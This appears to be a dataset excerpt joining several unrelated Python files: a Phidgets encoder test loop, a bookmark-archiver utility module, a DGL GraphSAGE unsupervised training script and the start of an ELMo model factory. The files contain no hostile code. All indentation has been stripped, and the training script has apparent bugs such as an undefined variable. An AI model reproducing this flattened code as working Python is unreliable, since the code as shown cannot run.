###################################################
CurrentTime_MainLoopThread = getPreciseSecondsTimeStampString() - StartingTime_MainLoopThread
###################################################
###################################################
if ENCODER_OPEN_FLAG == 1:
Encoder_MostRecentDict = Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject.GetMostRecentDataDict()
if "Time" in Encoder_MostRecentDict:
Encoder_MostRecentDict_EncodersList_Position_EncoderTicks = Encoder_MostRecentDict["EncodersList_Position_EncoderTicks"]
Encoder_MostRecentDict_EncodersList_Position_Rev = Encoder_MostRecentDict["EncodersList_Position_Rev"]
Encoder_MostRecentDict_EncodersList_Position_Degrees = Encoder_MostRecentDict["EncodersList_Position_Degrees"]
Encoder_MostRecentDict_EncodersList_IndexPosition_EncoderTicks = Encoder_MostRecentDict["EncodersList_IndexPosition_EncoderTicks"]
Encoder_MostRecentDict_EncodersList_IndexPosition_Rev = Encoder_MostRecentDict["EncodersList_IndexPosition_Rev"]
Encoder_MostRecentDict_EncodersList_IndexPosition_Degrees = Encoder_MostRecentDict["EncodersList_IndexPosition_Degrees"]
Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Raw = Encoder_MostRecentDict["EncodersList_Speed_EncoderTicksPerSecond_Raw"]
Encoder_MostRecentDict_EncodersList_Speed_RPM_Raw = Encoder_MostRecentDict["EncodersList_Speed_RPM_Raw"]
Encoder_MostRecentDict_EncodersList_Speed_RPS_Raw = Encoder_MostRecentDict["EncodersList_Speed_RPS_Raw"]
Encoder_MostRecentDict_EncodersList_Speed_EncoderTicksPerSecond_Filtered = Encoder_MostRecentDict["EncodersList_Speed_EncoderTicksPerSecond_Filtered"]
Encoder_MostRecentDict_EncodersList_Speed_RPM_Filtered = Encoder_MostRecentDict["EncodersList_Speed_RPM_Filtered"]
Encoder_MostRecentDict_EncodersList_Speed_RPS_Filtered = Encoder_MostRecentDict["EncodersList_Speed_RPS_Filtered"]
Encoder_MostRecentDict_EncodersList_ErrorCallbackFiredFlag = Encoder_MostRecentDict["EncodersList_ErrorCallbackFiredFlag"]
Encoder_MostRecentDict_Time = Encoder_MostRecentDict["Time"]
#print("Encoder_MostRecentDict_EncodersList_Position_EncoderTicks: " + str(Encoder_MostRecentDict_EncodersList_Position_EncoderTicks))
###################################################
time.sleep(0.002)
#################################################
#################################################
################################################# THIS IS THE EXIT ROUTINE!
#################################################
print("Exiting main program 'test_program_for_Phidgets1xEncoderENC1000_ReubenPython2and3Class.")
#################################################
if ENCODER_OPEN_FLAG == 1:
Phidgets1xEncoderENC1000_ReubenPython2and3ClassObject.ExitProgram_Callback()
#################################################
#################################################
if MYPRINT_OPEN_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.ExitProgram_Callback()
#################################################
#################################################
#################################################
##########################################################################################################
########################################################################################################## |
util.py | import os
import re
import sys
import time
import json
import requests
from datetime import datetime
from subprocess import run, PIPE, DEVNULL
from multiprocessing import Process
from urllib.parse import quote
from config import (
IS_TTY,
ARCHIVE_PERMISSIONS,
HTML_FOLDER,
ARCHIVE_DIR,
TIMEOUT,
TERM_WIDTH,
SHOW_PROGRESS,
ANSI,
CHROME_BINARY,
FETCH_WGET,
FETCH_PDF,
FETCH_SCREENSHOT,
FETCH_FAVICON,
FETCH_AUDIO,
FETCH_VIDEO,
SUBMIT_ARCHIVE_DOT_ORG,
)
# URL helpers
without_scheme = lambda url: url.replace('http://', '').replace('https://', '').replace('ftp://', '')
without_query = lambda url: url.split('?', 1)[0]
without_hash = lambda url: url.split('#', 1)[0]
without_path = lambda url: url.split('/', 1)[0]
domain = lambda url: without_hash(without_query(without_path(without_scheme(url))))
base_url = lambda url: without_scheme(url) # uniq base url used to dedupe links
short_ts = lambda ts: ts.split('.')[0]
def check_dependencies():
"""Check that all necessary dependencies are installed, and have valid versions"""
python_vers = float('{}.{}'.format(sys.version_info.major, sys.version_info.minor))
if python_vers < 3.5:
print('{}[X] Python version is not new enough: {} (>3.5 is required){}'.format(ANSI['red'], python_vers, ANSI['reset']))
print(' See https://github.com/pirate/bookmark-archiver#troubleshooting for help upgrading your Python installation.')
raise SystemExit(1)
if FETCH_PDF or FETCH_SCREENSHOT:
if run(['which', CHROME_BINARY], stdout=DEVNULL).returncode:
print('{}[X] Missing dependency: {}{}'.format(ANSI['red'], CHROME_BINARY, ANSI['reset']))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CHROME_BINARY))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
# parse chrome --version e.g. Google Chrome 61.0.3114.0 canary / Chromium 59.0.3029.110 built on Ubuntu, running on Ubuntu 16.04
try:
result = run([CHROME_BINARY, '--version'], stdout=PIPE)
version_str = result.stdout.decode('utf-8')
version_lines = re.sub("(Google Chrome|Chromium) (\\d+?)\\.(\\d+?)\\.(\\d+?).*?$", "\\2", version_str).split('\n')
version = [l for l in version_lines if l.isdigit()][-1]
if int(version) < 59:
print(version_lines)
print('{red}[X] Chrome version must be 59 or greater for headless PDF and screenshot saving{reset}'.format(**ANSI))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
except (IndexError, TypeError, OSError):
print('{red}[X] Failed to parse Chrome version, is it installed properly?{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CHROME_BINARY))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
if FETCH_WGET:
if run(['which', 'wget'], stdout=DEVNULL).returncode or run(['wget', '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: wget{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format('wget'))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
if FETCH_FAVICON or SUBMIT_ARCHIVE_DOT_ORG:
if run(['which', 'curl'], stdout=DEVNULL).returncode or run(['curl', '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: curl{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format('curl'))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
if FETCH_AUDIO or FETCH_VIDEO:
if run(['which', 'youtube-dl'], stdout=DEVNULL).returncode or run(['youtube-dl', '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: youtube-dl{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format('youtube-dl'))
print(' See https://github.com/pirate/bookmark-archiver for help.')
raise SystemExit(1)
def chmod_file(path, cwd='.', permissions=ARCHIVE_PERMISSIONS, timeout=30):
"""chmod -R <permissions> <cwd>/<path>"""
if not os.path.exists(os.path.join(cwd, path)):
raise Exception('Failed to chmod: {} does not exist (did the previous step fail?)'.format(path))
chmod_result = run(['chmod', '-R', permissions, path], cwd=cwd, stdout=DEVNULL, stderr=PIPE, timeout=timeout)
if chmod_result.returncode == 1:
print(' ', chmod_result.stderr.decode())
raise Exception('Failed to chmod {}/{}'.format(cwd, path))
def progress(seconds=TIMEOUT, prefix=''):
"""Show a (subprocess-controlled) progress bar with a <seconds> timeout,
returns end() function to instantly finish the progress
"""
if not SHOW_PROGRESS:
return lambda: None
chunk = 'โ' if sys.stdout.encoding == 'UTF-8' else '#'
chunks = TERM_WIDTH - len(prefix) - 20 # number of progress chunks to show (aka max bar width)
def progress_bar(seconds=seconds, prefix=prefix):
"""show timer in the form of progress bar, with percentage and seconds remaining"""
try:
for s in range(seconds * chunks):
progress = s / chunks / seconds * 100
bar_width = round(progress/(100/chunks))
# โโโโโโโโโโโโโโโโโโโโ 0.9% (1/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)'.format(
prefix,
ANSI['green'],
(chunk * bar_width).ljust(chunks),
ANSI['reset'],
round(progress, 1),
round(s/chunks),
seconds,
))
sys.stdout.flush()
time.sleep(1 / chunks)
# โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 100.0% (60/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)\n'.format(
prefix,
ANSI['red'],
chunk * chunks,
ANSI['reset'],
100.0,
seconds,
seconds,
))
sys.stdout.flush()
except KeyboardInterrupt:
print()
pass
p = Process(target=progress_bar)
p.start()
def end():
"""immediately finish progress and clear the progressbar line"""
p.terminate()
sys.stdout.write('\r{}{}\r'.format((' ' * TERM_WIDTH), ANSI['reset'])) # clear whole terminal line
sys.stdout.flush()
return end
def download_url(url):
"""download a given url's content into downloads/domain.txt"""
download_dir = os.path.join(ARCHIVE_DIR, 'downloads')
if not os.path.exists(download_dir):
os.makedirs(download_dir)
url_domain = url.split('/', 3)[2]
output_path = os.path.join(download_dir, '{}.txt'.format(url_domain))
print('[*] [{}] Downloading {} > {}'.format(
datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
url,
output_path,
))
end = progress(TIMEOUT, prefix=' ')
try:
downloaded_xml = requests.get(url).content.decode()
end()
except Exception as e:
end()
print('[!] Failed to download {}\n'.format(url))
print(' ', e)
raise SystemExit(1)
with open(output_path, 'w', encoding='utf-8') as f:
f.write(downloaded_xml)
return output_path
def str_between(string, start, end=None):
"""(<abc>12345</def>, <abc>, </def>) -> 12345"""
content = string.split(start, 1)[-1]
if end is not None:
content = content.rsplit(end, 1)[0]
return content
def get_link_type(link):
"""Certain types of links need to be handled specially, this figures out when that's the case"""
if link['base_url'].endswith('.pdf'):
return 'PDF'
elif link['base_url'].rsplit('.', 1) in ('pdf', 'png', 'jpg', 'jpeg', 'svg', 'bmp', 'gif', 'tiff', 'webp'):
return 'image'
elif 'wikipedia.org' in link['domain']:
return 'wiki'
elif 'youtube.com' in link['domain']:
return 'youtube'
elif 'soundcloud.com' in link['domain']:
return 'soundcloud'
elif 'youku.com' in link['domain']:
return 'youku'
elif 'vimeo.com' in link['domain']:
return 'vimeo'
return None
def merge_links(a, b):
"""deterministially merge two links, favoring longer field values over shorter,
and "cleaner" values over worse ones.
"""
longer = lambda key: a[key] if len(a[key]) > len(b[key]) else b[key]
earlier = lambda key: a[key] if a[key] < b[key] else b[key]
url = longer('url')
longest_title = longer('title')
cleanest_title = a['title'] if '://' not in a['title'] else b['title']
link = {
'timestamp': earlier('timestamp'),
'url': url,
'domain': domain(url),
'base_url': base_url(url),
'tags': longer('tags'),
'title': longest_title if '://' not in longest_title else cleanest_title,
'sources': list(set(a.get('sources', []) + b.get('sources', []))),
}
link['type'] = get_link_type(link)
return link
def find_link(folder, links):
"""for a given archive folder, find the corresponding link object in links"""
url = parse_url(folder)
if url:
for link in links:
if (link['base_url'] in url) or (url in link['url']):
return link
timestamp = folder.split('.')[0]
for link in links:
if link['timestamp'].startswith(timestamp):
if link['domain'] in os.listdir(os.path.join(ARCHIVE_DIR, 'html/archive', folder)):
return link # careful now, this isn't safe for most ppl
if link['domain'] in parse_url(folder):
return link
return None
def parse_url(folder):
"""for a given archive folder, figure out what url it's for"""
link_json = os.path.join(ARCHIVE_DIR, 'html/archive', folder, 'index.json')
if os.path.exists(link_json):
with open(link_json, 'r') as f:
try:
link_json = f.read().strip()
if link_json:
link = json.loads(link_json)
return link['base_url']
except ValueError:
print('File contains invalid JSON: {}!'.format(link_json))
archive_org_txt = os.path.join(ARCHIVE_DIR, 'html/archive' + folder, 'archive.org.txt')
if os.path.exists(archive_org_txt):
with open(archive_org_txt, 'r') as f:
original_link = f.read().strip().split('/http', 1)[-1]
with_scheme = 'http{}'.format(original_link)
return with_scheme
return ''
def manually_merge_folders(source, target):
"""prompt for user input to resolve a conflict between two archive folders"""
if not IS_TTY:
return
fname = lambda path: path.split('/')[-1]
print(' {} and {} have conflicting files, which do you want to keep?'.format(fname(source), fname(target)))
print(' - [enter]: do nothing (keep both)')
print(' - a: prefer files from {}'.format(source))
print(' - b: prefer files from {}'.format(target))
print(' - q: quit and resolve the conflict manually')
try:
answer = input('> ').strip().lower()
except KeyboardInterrupt:
answer = 'q'
assert answer in ('', 'a', 'b', 'q'), 'Invalid choice.'
if answer == 'q':
print('\nJust run Bookmark Archiver again to pick up where you left off.')
raise SystemExit(0)
elif answer == '':
return
files_in_source = set(os.listdir(source))
files_in_target = set(os.listdir(target))
for file in files_in_source:
if file in files_in_target:
to_delete = target if answer == 'a' else source
run(['rm', '-Rf', os.path.join(to_delete, file)])
run(['mv', os.path.join(source, file), os.path.join(target, file)])
if not set(os.listdir(source)):
run(['rm', '-Rf', source])
def fix_folder_path(archive_path, link_folder, link):
"""given a folder, merge it to the canonical 'correct' path for the given link object"""
source = os.path.join(archive_path, link_folder)
target = os.path.join(archive_path, link['timestamp'])
url_in_folder = parse_url(source)
if not (url_in_folder in link['base_url']
or link['base_url'] in url_in_folder):
raise ValueError('The link does not match the url for this folder.')
if not os.path.exists(target):
# target doesn't exist so nothing needs merging, simply move A to B
run(['mv', source, target])
else:
# target folder exists, check for conflicting files and attempt manual merge
files_in_source = set(os.listdir(source))
files_in_target = set(os.listdir(target))
conflicting_files = files_in_source & files_in_target
if not conflicting_files:
for file in files_in_source:
run(['mv', os.path.join(source, file), os.path.join(target, file)])
if os.path.exists(source):
files_in_source = set(os.listdir(source))
if files_in_source:
manually_merge_folders(source, target)
else:
run(['rm', '-R', source])
def cleanup_archive(archive_path, links):
"""move any incorrectly named folders to their canonical locations"""
# for each folder that exists, see if we can match it up with a known good link
# if we can, then merge the two folders (TODO: if not, move it to lost & found)
unmatched = []
bad_folders = []
if not os.path.exists(archive_path):
return
for folder in os.listdir(archive_path):
try:
files = os.listdir(os.path.join(archive_path, folder))
except NotADirectoryError:
continue
if files:
link = find_link(folder, links)
if link is None:
unmatched.append(folder)
continue
if folder != link['timestamp']:
bad_folders.append((folder, link))
else:
# delete empty folders
run(['rm', '-R', os.path.join(archive_path, folder)])
if bad_folders and IS_TTY and input('[!] Cleanup archive? y/[n]: ') == 'y':
print('[!] Fixing {} improperly named folders in archive...'.format(len(bad_folders)))
for folder, link in bad_folders:
fix_folder_path(archive_path, folder, link)
elif bad_folders:
print('[!] Warning! {} folders need to be merged, fix by running bookmark archiver.'.format(len(bad_folders)))
if unmatched:
print('[!] Warning! {} unrecognized folders in html/archive/'.format(len(unmatched)))
print(' '+ '\n '.join(unmatched))
def wget_output_path(link, look_in=None):
"""calculate the path to the wgetted .html file, since wget may
adjust some paths to be different than the base_url path.
See docs on wget --adjust-extension (-E)
"""
urlencode = lambda s: quote(s, encoding='utf-8', errors='replace')
if link['type'] in ('PDF', 'image'):
return urlencode(link['base_url'])
# Since the wget algorithm to for -E (appending .html) is incredibly complex
# instead of trying to emulate it here, we just look in the output folder
# to see what html file wget actually created as the output
wget_folder = link['base_url'].rsplit('/', 1)[0].split('/')
look_in = os.path.join(HTML_FOLDER, 'archive', link['timestamp'], *wget_folder)
if look_in and os.path.exists(look_in):
html_files = [
f for f in os.listdir(look_in)
if re.search(".+\\.[Hh][Tt][Mm][Ll]?$", f, re.I | re.M)
]
if html_files:
return urlencode(os.path.join(*wget_folder, html_files[0]))
return None
# If finding the actual output file didn't work, fall back to the buggy
# implementation of the wget .html appending algorithm
# split_url = link['url'].split('#', 1)
# query = ('%3F' + link['url'].split('?', 1)[-1]) if '?' in link['url'] else ''
# if re.search(".+\\.[Hh][Tt][Mm][Ll]?$", split_url[0], re.I | re.M):
# # already ends in .html
# return urlencode(link['base_url'])
# else:
# # .html needs to be appended
# without_scheme = split_url[0].split('://', 1)[-1].split('?', 1)[0]
# if without_scheme.endswith('/'):
# if query:
# return urlencode('#'.join([without_scheme + 'index.html' + query + '.html', *split_url[1:]]))
# return urlencode('#'.join([without_scheme + 'index.html', *split_url[1:]]))
# else:
# if query:
# return urlencode('#'.join([without_scheme + '/index.html' + query + '.html', *split_url[1:]]))
# elif '/' in without_scheme:
# return urlencode('#'.join([without_scheme + '.html', *split_url[1:]]))
# return urlencode(link['base_url'] + '/index.html')
def derived_link_info(link):
"""extend link info with the archive urls and other derived data"""
link_info = {
**link,
'date': datetime.fromtimestamp(float(link['timestamp'])).strftime('%Y-%m-%d %H:%M'),
'google_favicon_url': 'https://www.google.com/s2/favicons?domain={domain}'.format(**link),
'favicon_url': 'archive/{timestamp}/favicon.ico'.format(**link),
'files_url': 'archive/{timestamp}/index.html'.format(**link),
'archive_url': 'archive/{}/{}'.format(link['timestamp'], wget_output_path(link)),
'pdf_link': 'archive/{timestamp}/output.pdf'.format(**link),
'screenshot_link': 'archive/{timestamp}/screenshot.png'.format(**link),
'archive_org_url': 'https://web.archive.org/web/{base_url}'.format(**link),
}
# PDF and images are handled slightly differently
# wget, screenshot, & pdf urls all point to the same file
if link['type'] in ('PDF', 'image'):
link_info.update({
'archive_url': 'archive/{timestamp}/{base_url}'.format(**link),
'pdf_link': 'archive/{timestamp}/{base_url}'.format(**link),
'screenshot_link': 'archive/{timestamp}/{base_url}'.format(**link),
'title': '{title} ({type})'.format(**link),
})
return link_info
|
train_sampling_unsupervised.py | import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.multiprocessing as mp
from torch.utils.data import DataLoader
import dgl.function as fn
import dgl.nn.pytorch as dglnn
import time
import argparse
from _thread import start_new_thread
from functools import wraps
from dgl.data import RedditDataset
from torch.nn.parallel import DistributedDataParallel
import tqdm
import traceback
import sklearn.linear_model as lm
import sklearn.metrics as skm
from utils import thread_wrapped_func
#### Negative sampler
class NegativeSampler(object):
def __init__(self, g):
self.weights = g.in_degrees().float() ** 0.75
def __call__(self, num_samples):
return self.weights.multinomial(num_samples, replacement=True)
#### Neighbor sampler
class NeighborSampler(object):
def __init__(self, g, fanouts, num_negs, neg_share=False):
self.g = g
self.fanouts = fanouts
self.neg_sampler = NegativeSampler(g)
self.num_negs = num_negs
self.neg_share = neg_share
def sample_blocks(self, seed_edges):
n_edges = len(seed_edges)
seed_edges = th.LongTensor(np.asarray(seed_edges))
heads, tails = self.g.find_edges(seed_edges)
if self.neg_share and n_edges % self.num_negs == 0:
neg_tails = self.neg_sampler(n_edges)
neg_tails = neg_tails.view(-1, 1, self.num_negs).expand(n_edges//self.num_negs,
self.num_negs,
self.num_negs).flatten()
neg_heads = heads.view(-1, 1).expand(n_edges, self.num_negs).flatten()
else:
neg_tails = self.neg_sampler(self.num_negs * n_edges)
neg_heads = heads.view(-1, 1).expand(n_edges, self.num_negs).flatten()
# Maintain the correspondence between heads, tails and negative tails as two
# graphs.
# pos_graph contains the correspondence between each head and its positive tail.
# neg_graph contains the correspondence between each head and its negative tails.
# Both pos_graph and neg_graph are first constructed with the same node space as
# the original graph. Then they are compacted together with dgl.compact_graphs.
pos_graph = dgl.graph((heads, tails), num_nodes=self.g.number_of_nodes())
neg_graph = dgl.graph((neg_heads, neg_tails), num_nodes=self.g.number_of_nodes())
pos_graph, neg_graph = dgl.compact_graphs([pos_graph, neg_graph])
# Obtain the node IDs being used in either pos_graph or neg_graph. Since they
# are compacted together, pos_graph and neg_graph share the same compacted node
# space.
seeds = pos_graph.ndata[dgl.NID]
blocks = []
for fanout in self.fanouts:
# For each seed node, sample ``fanout`` neighbors.
frontier = dgl.sampling.sample_neighbors(self.g, seeds, fanout, replace=True)
# Remove all edges between heads and tails, as well as heads and neg_tails.
_, _, edge_ids = frontier.edge_ids(
th.cat([heads, tails, neg_heads, neg_tails]),
th.cat([tails, heads, neg_tails, neg_heads]),
return_uv=True)
frontier = dgl.remove_edges(frontier, edge_ids)
# Then we compact the frontier into a bipartite graph for message passing.
block = dgl.to_block(frontier, seeds)
# Pre-generate CSR format that it can be used in training directly
block.in_degree(0)
# Obtain the seed nodes for next layer.
seeds = block.srcdata[dgl.NID]
blocks.insert(0, block)
# Pre-generate CSR format that it can be used in training directly
return pos_graph, neg_graph, blocks
def load_subtensor(g, input_nodes, device):
"""
Copys features and labels of a set of nodes onto GPU.
"""
batch_inputs = g.ndata['features'][input_nodes].to(device)
return batch_inputs
class SAGE(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation,
dropout):
super().__init__()
self.n_layers = n_layers
self.n_hidden = n_hidden
self.n_classes = n_classes
self.layers = nn.ModuleList()
self.layers.append(dglnn.SAGEConv(in_feats, n_hidden, 'mean'))
for i in range(1, n_layers - 1):
self.layers.append(dglnn.SAGEConv(n_hidden, n_hidden, 'mean'))
self.layers.append(dglnn.SAGEConv(n_hidden, n_classes, 'mean'))
self.dropout = nn.Dropout(dropout)
self.activation = activation
def forward(self, blocks, x):
h = x
for l, (layer, block) in enumerate(zip(self.layers, blocks)):
h = layer(block, h)
if l != len(self.layers) - 1:
h = self.activation(h)
h = self.dropout(h)
return h
def inference(self, g, x, batch_size, device):
"""
Inference with the GraphSAGE model on full neighbors (i.e. without neighbor sampling).
g : the entire graph.
x : the input of entire node set.
The inference code is written in a fashion that it could handle any number of nodes and
layers.
"""
# During inference with sampling, multi-layer blocks are very inefficient because
# lots of computations in the first few layers are repeated.
# Therefore, we compute the representation of all nodes layer by layer. The nodes
# on each layer are of course splitted in batches.
# TODO: can we standardize this?
nodes = th.arange(g.number_of_nodes())
for l, layer in enumerate(self.layers):
y = th.zeros(g.number_of_nodes(), self.n_hidden if l != len(self.layers) - 1 else self.n_classes)
for start in tqdm.trange(0, len(nodes), batch_size):
end = start + batch_size
batch_nodes = nodes[start:end]
block = dgl.to_block(dgl.in_subgraph(g, batch_nodes), batch_nodes)
block = block.to(device)
input_nodes = block.srcdata[dgl.NID]
h = x[input_nodes].to(device)
h = layer(block, h)
if l != len(self.layers) - 1:
h = self.activation(h)
h = self.dropout(h)
y[start:end] = h.cpu()
x = y
return y
class CrossEntropyLoss(nn.Module):
def forward(self, block_outputs, pos_graph, neg_graph):
with pos_graph.local_scope():
pos_graph.ndata['h'] = block_outputs
pos_graph.apply_edges(fn.u_dot_v('h', 'h', 'score'))
pos_score = pos_graph.edata['score']
with neg_graph.local_scope():
neg_graph.ndata['h'] = block_outputs
neg_graph.apply_edges(fn.u_dot_v('h', 'h', 'score'))
neg_score = neg_graph.edata['score']
score = th.cat([pos_score, neg_score])
label = th.cat([th.ones_like(pos_score), th.zeros_like(neg_score)]).long()
loss = F.binary_cross_entropy_with_logits(score, label.float())
return loss
def compute_acc(emb, labels, train_nids, val_nids, test_nids):
"""
Compute the accuracy of prediction given the labels.
"""
emb = emb.cpu().numpy()
train_nids = train_nids.cpu().numpy()
train_labels = labels[train_nids].cpu().numpy()
val_nids = val_nids.cpu().numpy()
val_labels = labels[val_nids].cpu().numpy()
test_nids = test_nids.cpu().numpy()
test_labels = labels[test_nids].cpu().numpy()
emb = (emb - emb.mean(0, keepdims=True)) / emb.std(0, keepdims=True)
lr = lm.LogisticRegression(multi_class='multinomial', max_iter=10000)
lr.fit(emb[train_nids], labels[train_nids])
pred = lr.predict(emb)
f1_micro_eval = skm.f1_score(labels[val_nids], pred[val_nids], average='micro')
f1_micro_test = skm.f1_score(labels[test_nids], pred[test_nids], average='micro')
f1_macro_eval = skm.f1_score(labels[val_nids], pred[val_nids], average='macro')
f1_macro_test = skm.f1_score(labels[test_nids], pred[test_nids], average='macro')
return f1_micro_eval, f1_micro_test
def evaluate(model, g, inputs, labels, train_nids, val_nids, test_nids, batch_size, device):
"""
Evaluate the model on the validation set specified by ``val_mask``.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
val_mask : A 0-1 mask indicating which nodes do we actually compute the accuracy for.
batch_size : Number of nodes to compute at the same time.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
# single gpu
if isinstance(model, SAGE):
pred = model.inference(g, inputs, batch_size, device)
# multi gpu
else:
pred = model.module.inference(g, inputs, batch_size, device)
model.train()
return compute_acc(pred, labels, train_nids, val_nids, test_nids)
#### Entry point
def run(proc_id, n_gpus, args, devices, data):
# Unpack data
device = devices[proc_id]
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
train_mask, val_mask, test_mask, in_feats, labels, n_classes, g = data
train_nid = th.LongTensor(np.nonzero(train_mask)[0])
val_nid = th.LongTensor(np.nonzero(val_mask)[0])
test_nid = th.LongTensor(np.nonzero(test_mask)[0])
# Create sampler
sampler = NeighborSampler(g, [int(fanout) for fanout in args.fan_out.split(',')], args.num_negs, args.neg_share)
# Create PyTorch DataLoader for constructing blocks
train_seeds = np.arange(g.number_of_edges())
if n_gpus > 0:
num_per_gpu = (train_seeds.shape[0] + n_gpus -1) // n_gpus
train_seeds = train_seeds[proc_id * num_per_gpu :
(proc_id + 1) * num_per_gpu \
if (proc_id + 1) * num_per_gpu < train_seeds.shape[0]
else train_seeds.shape[0]]
dataloader = DataLoader(
dataset=train_seeds,
batch_size=args.batch_size,
collate_fn=sampler.sample_blocks,
shuffle=True,
drop_last=False,
pin_memory=True,
num_workers=args.num_workers)
# Define model and optimizer
model = SAGE(in_feats, args.num_hidden, args.num_hidden, args.num_layers, F.relu, args.dropout)
model = model.to(device)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[device], output_device=device)
loss_fcn = CrossEntropyLoss()
loss_fcn = loss_fcn.to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Training loop
avg = 0
iter_pos = []
iter_neg = []
iter_d = []
iter_t = []
best_eval_acc = 0
best_test_acc = 0
for epoch in range(args.num_epochs):
tic = time.time()
# Loop over the dataloader to sample the computation dependency graph as a list of
# blocks.
tic_step = time.time()
for step, (pos_graph, neg_graph, blocks) in enumerate(dataloader):
# The nodes for input lies at the LHS side of the first block.
# The nodes for output lies at the RHS side of the last block.
input_nodes = blocks[0].srcdata[dgl.NID]
batch_inputs = load_subtensor(g, input_nodes, device)
d_step = time.time()
pos_graph = pos_graph.to(device)
neg_graph = neg_graph.to(device)
blocks = [block.to(device) for block in blocks]
# Compute loss and prediction
batch_pred = model(blocks, batch_inputs)
loss = loss_fcn(batch_pred, pos_graph, neg_graph)
optimizer.zero_grad()
loss.backward()
optimizer.step()
t = time.time()
pos_edges = pos_graph.number_of_edges()
neg_edges = neg_graph.number_of_edges()
iter_pos.append(pos_edges / (t - tic_step))
iter_neg.append(neg_edges / (t - tic_step))
iter_d.append(d_step - tic_step)
iter_t.append(t - d_step)
if step % args.log_every == 0:
gpu_mem_alloc = th.cuda.max_memory_allocated() / 1000000 if th.cuda.is_available() else 0
print('[{}]Epoch {:05d} | Step {:05d} | Loss {:.4f} | Speed (samples/sec) {:.4f}|{:.4f} | Load {:.4f}| train {:.4f} | GPU {:.1f} MiB'.format(
proc_id, epoch, step, loss.item(), np.mean(iter_pos[3:]), np.mean(iter_neg[3:]), np.mean(iter_d[3:]), np.mean(iter_t[3:]), gpu_mem_alloc))
tic_step = time.time()
if step % args.eval_every == 0 and proc_id == 0:
eval_acc, test_acc = evaluate(model, g, g.ndata['features'], labels, train_nid, val_nid, test_nid, args.batch_size, device)
print('Eval Acc {:.4f} Test Acc {:.4f}'.format(eval_acc, test_acc))
if eval_acc > best_eval_acc:
best_eval_acc = eval_acc
best_test_acc = test_acc
print('Best Eval Acc {:.4f} Test Acc {:.4f}'.format(best_eval_acc, best_test_acc))
if n_gpus > 1:
th.distributed.barrier()
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
def main(args, devices):
# load reddit data
data = RedditDataset(self_loop=True)
train_mask = data.train_mask
val_mask = data.val_mask
test_mask = data.test_mask
features = th.Tensor(data.features)
in_feats = features.shape[1]
labels = th.LongTensor(data.labels)
n_classes = data.num_labels
# Construct graph
g = dgl.graph(data.graph.all_edges())
g.ndata['features'] = features
# Pack data
data = train_mask, val_mask, test_mask, in_feats, labels, n_classes, g
n_gpus = len(devices)
if devices[0] == -1:
run(0, 0, args, ['cpu'], data)
if n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=thread_wrapped_func(run),
args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
run(args, device, data)
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument("--gpu", type=str, default='0',
help="GPU, can be a list of gpus for multi-gpu trianing, e.g., 0,1,2,3; -1 for CPU")
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--num-negs', type=int, default=1)
argparser.add_argument('--neg-share', default=False, action='store_true',
help="sharing neg nodes for positive nodes")
argparser.add_argument('--fan-out', type=str, default='10,25')
argparser.add_argument('--batch-size', type=int, default=10000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=1000)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--dropout', type=float, default=0.5)
argparser.add_argument('--num-workers', type=int, default=0,
help="Number of sampling processes. Use 0 for no extra process.")
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
main(args, devices)
|
elmo_factory.py | import os
from pathlib import Path
from allennlp.commands.elmo import ElmoEmbedder
from logging import getLogger
import owncloud
import threading
from enum import Enum
from src.cloud.cloud_connection import CloudConnection
class FileStatus(Enum):
Fetching = 1
Ready = 2
class ELMoFactory:
__logger = getLogger(__name__)
__RESOURCE_PATH = (Path.cwd() / "src/resources/models").resolve()
__OPTIONS_PATH = (__RESOURCE_PATH / "elmo_2x4096_512_2048cnn_2xhighway_5.5B_options.json").resolve()
__DEFAULT_WEIGHT_FILE = "elmo_2x4096_512_2048cnn_2xhighway_5.5B_weights.hdf5"
ELMo_models_cache = {}
ELMo_to_status = {__DEFAULT_WEIGHT_FILE: FileStatus.Ready}
